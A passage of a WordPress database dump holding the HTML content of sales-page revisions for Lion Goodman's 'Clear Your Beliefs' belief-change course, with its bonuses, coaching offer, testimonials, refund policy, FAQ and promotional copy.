href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Sample Program Page', '', 'inherit', 'closed', 'open', '', '2009-revision-v1', '', '', '2014-12-11 23:48:03', '2014-12-12 04:48:03', '', 2009, 'http://clearyourbeliefs.com/2009-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2011, 2, '2014-12-11 23:48:24', '2014-12-12 04:48:24', '&nbsp;\n&nbsp;&nbsp;\n\n&nbsp;\n&nbsp;&nbsp;\n\n&nbsp;\n\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;', 'Sample Program Page', '', 'inherit', 'closed', 'open', '', '2009-autosave-v1', '', '', '2014-12-11 23:48:24', '2014-12-12 04:48:24', '', 2009, 'http://clearyourbeliefs.com/2009-autosave-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2013, 2, '2014-12-11 23:50:56', '2014-12-12 04:50:56', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your 